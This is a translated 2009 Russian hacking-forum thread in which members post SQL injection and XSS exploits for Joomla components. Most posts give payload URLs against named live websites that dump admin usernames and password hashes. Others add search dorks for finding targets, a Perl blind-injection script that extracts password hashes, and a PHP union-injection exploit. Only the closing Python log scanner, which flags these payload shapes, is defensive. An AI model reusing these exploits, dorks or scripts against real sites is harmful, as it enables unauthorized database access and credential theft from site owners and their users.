ANTICHAT: forum on information security, OSINT and technology
ANTICHAT is a Russian-language community on security, OSINT and programming.
The forum previously ran on the domains antichat.ru, antichat.com and antichat.club,
and is now available again at a new address:
forum.antichat.xyz.
The forum has been restored and continues to develop: archived threads are available, and new discussions and materials are being added.
⚠️ Old accounts cannot be restored; you need to register again.

30.06.2009, 17:11
Regular
Registered: 12.12.2006
Posts: 906
Time on forum: 4205500
Reputation: 930
com_svmap
I stumbled on this by accident. Maybe someone can take it further, if there is anything to take further.
Code:
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2

30.06.2009, 17:52
Learner
Registered: 04.01.2009
Posts: 94
Time on forum: 404716
Reputation: 145
Quote from Fata1ex:
com_svmap
I stumbled on this by accident. Maybe someone can take it further, if there is anything to take further.
Code:
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
If I'm not mistaken, this isn't a hole, just an error in data handling.

08.07.2009, 15:50
Reservists Of Antichat - Level 6
Registered: 07.07.2009
Posts: 324
Time on forum: 1585404
Reputation: 564
SQL injection in the doQment component for Joomla
Vulnerability: vulnerable parameter cid=
Example:
Code:
http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users/**/where/**/usertype=CHAR(83,117,112,101,114,32,65,100,109,105 ,110,105,115,116,114,97,116,111,114)#&Itemid=92
Dork: inurl:com_doqment + cid=
# shell_c0de
Last edited by shell_c0de; 08.07.2009 at 15:53.

28.07.2009, 17:48
Regular
Registered: 15.03.2009
Posts: 435
Time on forum: 4061203
Reputation: 704
Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting
Description:
Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks.
1) Input passed via the "replid" to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 7.5. Other versions may also be affected.
Code:
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
[!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
==============================================================================
Script: [ Joomla Almond Classifieds v.7.5 ]
Language: [ PHP ]
Download: [ http://www.almondsoft.com ]
Founder: [ Moudi <m0udi@9.cn> ]
Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
Team: [ EvilWay ]
Dork: [ OFF ]
Price: [ $195 ]
Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE
http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5 => TRUE
http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5 => FALSE
===[ Exploit XSS + LIVE : vulnerability ]===
http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>
Author: Moudi
###########################################################################

29.07.2009, 14:55
Forum member
Registered: 17.05.2008
Posts: 102
Time on forum: 1054394
Reputation: 74
Joomla component com_fireboard SQL-inj
Vulnerable parameter: func
Code:
?func=who',%20userid=123,%20link=(SELECT %20jos_users.password%20FROM%20jos_users%20WHERE%20jos_users.id=123)%20--%20a
For more detail, see here
http://forum.antichat.ru/threadnav130926-1-10.html
and here
http://forum.antichat.ru/showpost.php?p=1409117&postcount=33

02.08.2009, 10:57
Regular
Registered: 16.02.2008
Posts: 395
Time on forum: 3370466
Reputation: 96
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : Blind SQL injection
###################################################
Example:
Code:
http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid
Sql code:
Code:
+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...
DEMO LIVE:
Code:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
Code:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97 !False ¡¡¡¡
Code:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98 ¡True ¡¡¡¡
etc, etc...
# milw0rm.com [2009-08-01]
Last edited by swt1; 02.08.2009 at 11:01.

02.08.2009, 10:58
Regular
Registered: 16.02.2008
Posts: 395
Time on forum: 3370466
Reputation: 96
http://wwww.host.org/Path : http://www.cd7.com.ec/
[-] Introduce Itemid : 66
[-] Introduce coincidencia : http://www.cd7.com.ec/forum/
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
Code (Perl):
#!/usr/bin/perl -w
use LWP::UserAgent;
use Benchmark;

my $t1 = new Benchmark;
print "\t\t-------------------------------------------------------------\n\n";
print "\t\t | Chip d3 Bi0s | \n\n";
print "\t\t Joomla Component com_jfusion (Itemid) Blind SQL-injection \n\n";
print "\t\t-------------------------------------------------------------\n\n";
print "http://wwww.host.org/Path : "; chomp(my $target=<STDIN>);
print " [-] Introduce Itemid : "; chomp($z=<STDIN>);
print " [-] Introduce coincidencia : "; chomp($w=<STDIN>);
$column_name="concat(password)";
$table_name="jos_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
print "----------------Inyectando----------------\n";
# is it vulnerable?
$host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=1";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {
    $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=2";
    my $res = $b->request(HTTP::Request->new(GET=>$host));
    my $content = $res->content;
    my $regexp = $w;
    if ($content =~ /$regexp/) {
        print " [-] Exploit Fallo :(\n";
    } else {
        print " [-] Vulnerable :)\n";
        for ($x=1;$x<=32;$x++) {
            $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))>57";
            my $res = $b->request(HTTP::Request->new(GET=>$host));
            my $content = $res->content;
            my $regexp = $w;
            print " [!] ";
            if($x <= 9 ) {print "0$x";} else {print $x;}   # align 0..9 with 10..32
            if ($content =~ /$regexp/) {
                for ($c=97;$c<=102;$c++) {
                    $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." ";
                    my $res = $b->request(HTTP::Request->new(GET=>$host));
                    my $content = $res->content;
                    my $regexp = $w;
                    if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
                }
            } else {
                for ($c=48;$c<=57;$c++) {
                    $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." ";
                    my $res = $b->request(HTTP::Request->new(GET=>$host));
                    my $content = $res->content;
                    my $regexp = $w;
                    if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
                }
            }
        }
        print " [+] Password :"." ".join('', @caracter) . "\n";
        my $t2 = new Benchmark;
        my $tt = timediff($t2, $t1);
        print "El script tomo:",timestr($tt),"\n";
    }
} else {
    print " [-] Exploit Fallo :(\n";
}
# milw0rm.com [2009-08-01]
Last edited by swt1; 02.08.2009 at 11:25.

08.08.2009, 12:19
Regular
Registered: 16.02.2008
Posts: 395
Time on forum: 3370466
Reputation: 96
Joomla Component com_pms 2.0.4 (Ignore-List) SQL Injection Exploit
PHP code:
<?php
/*
--------------------------
Joomla <=1.0.15 Component com_pms <=2.0.4 (Ignore-List) SQl-Injection Vuln
--------------------------
Author: M4dhead
Vulnerable joomla component : com_pms
Conditions : magic_quotes_gpc = On or Off it doesn't matter ;)
--------------------------
PREPARATION:
--------------------------
You need a valid Account on the Joomla 1.0.15 Site + Community Builder Suite 1.1.0:
Community Builder Suite 1.1.0:
http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,1175.html
PMS enhanced Version 2.0.4 J 1.0
http://www.make-website.de/script-downlaods?task=summary&cid=123&catid=214
Install Joomla 1.0.15
Install Community Builder
Install PMS Enhanced
Activate the Ignorlist in Components->PMS Enhanced->Config
Tab: Backend -> Ingorlist: Yes
Create a valid User on the target Joomla 1.0.15 System with Community Builder,
login and copy the cookieinformation into the $cookie var below,
adjust the User-Agent on your Post Header dependent on your Browser.
Notice: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
because the cookie-name is dependent on your browser.
--------------------------
USAGE:
--------------------------
Run this script! If there's not shown a page that prompt you to login, the attack was successful.
Then go to the ignore list: www.yourtargetsite.com/index.php?option=com_pms&Itemid=&page=ignore
and you will see some username and passwords in the selectbox :-)
Have fun!!
----------------------------------------------------
*/
$host = "localhost"; //your target Joomla Site
$cookie = "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e14367d5c7298f6c72c"; //replace this with your own cookie values
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n";
//NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
//because the cookie-name is dependent on your browser.
//Don't change anything below
$path = "/joomla/index.php?option=com_pms&Itemid=&page=ignore"; //dont change this
$data_to_send = "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"; //you don't have to change this
print_r($post = PostToHost($host, $path, $cookie, $data_to_send, $useragent));
function PostToHost($host, $path, $cookie, $data_to_send, $useragent) {
$fp = fsockopen($host, 80);
fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "User-Agent: $useragent");
fputs($fp, "Cookie: $cookie\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ". strlen($data_to_send) ."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while(!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);
return $res;
}
?>
# milw0rm.com [2009-08-07]

10.08.2009, 12:04
Learner
Registered: 17.09.2008
Posts: 56
Time on forum: 587324
Reputation: 40
COM_SOBI2
SQL INJECTION
http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.html
Tested only on Joomla_1.0.x
Code:
index.php?option=com_sobi2&sobi2Task=search&Itemid=26
benchmark
Enter in the search field:
Code:
')and+benchmark(10000000,benchmark(10000000,md5(now())))# a
Be sure to remove all spaces
and click search)
Last edited by FAQ666; 10.08.2009 at 13:28.

10.09.2009, 04:10
Members of Antichat - Level 5
Registered: 23.08.2007
Posts: 417
Time on forum: 14324684
Reputation: 3908
Joomla/Mambo component vulnerabilities
Vulnerability: SQL-Inj
Component: The Publications
Vulnerability in the file publications.php
Vulnerable code:
PHP code:
$query = "SELECT * FROM #__content WHERE catid=$id ORDER BY title DESC";
Example:
Code:
http://www.bscic.gov.bd/index.php?option=com_publications&Itemid=20&lang=en&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+jos_users--
__________________
Feci, quod potui. Faciant meliora potentes.
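Every payload in this thread arrives as a query string, so a log-side check is the practical defender takeaway. The following is an added example and not code from any post here: it decodes each request target, collapses the /**/ comment spacing the payloads rely on, and flags the union, boolean-blind, benchmark and jos_users shapes quoted above. The log lines, IPs and timestamps are constructed for the example; only the query-string shapes mirror the thread.

```python
import re
from urllib.parse import unquote_plus

# Request-line extractor for Apache/nginx combined-format access logs
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Shapes of the injections quoted in this thread, applied to the decoded,
# comment-stripped, lower-cased query string so /**/ and '+' spacing do not hide them.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "boolean_blind": re.compile(r"\b(?:and|or)\s+(?:\d+\s*=\s*\d+|ascii\s*\(|substring\s*\()"),
    "time_based": re.compile(r"\b(?:benchmark|sleep)\s*\("),
    "joomla_users_table": re.compile(r"\bfrom\s+jos_users\b"),
}

# Constructed sample lines (IPs, timestamps and hosts are made up, not the sites
# named in the thread); the query strings mirror the thread's payload shapes.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Sep/2009:04:10:00 +0000] "GET /index.php?option=com_publications&Itemid=20&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4+from+jos_users-- HTTP/1.1" 200 5120
10.0.0.6 - - [10/Sep/2009:04:10:01 +0000] "GET /index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97 HTTP/1.1" 200 3300
10.0.0.7 - - [10/Sep/2009:04:10:02 +0000] "GET /index.php?option=com_sobi2&sobi2Task=search&Itemid=26&search=%27%29and%2Bbenchmark%2810000000%2Cmd5%28now%28%29%29%29%23 HTTP/1.1" 200 900
10.0.0.8 - - [10/Sep/2009:04:10:03 +0000] "GET /index.php?option=com_content&Itemid=20&id=6 HTTP/1.1" 200 4200
"""

def normalize_query(target: str) -> str:
    """Return the decoded query string with SQL comments collapsed to single spaces."""
    query = target.split("?", 1)[1] if "?" in target else ""
    query = unquote_plus(query)               # %xx -> char, '+' -> space
    query = re.sub(r"/\*.*?\*/", " ", query)  # /**/ used as a space substitute
    return re.sub(r"\s+", " ", query).lower()

def scan_log(text: str):
    """Return a list of (client_ip, path, [signature names]) for suspicious requests."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = normalize_query(m.group("target"))
        matched = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
        if matched:
            hits.append((m.group("ip"), m.group("target").split("?", 1)[0], matched))
    return hits

if __name__ == "__main__":
    for ip, path, sigs in scan_log(SAMPLE_LOG):
        print(f"{ip} {path} {','.join(sigs)}")
```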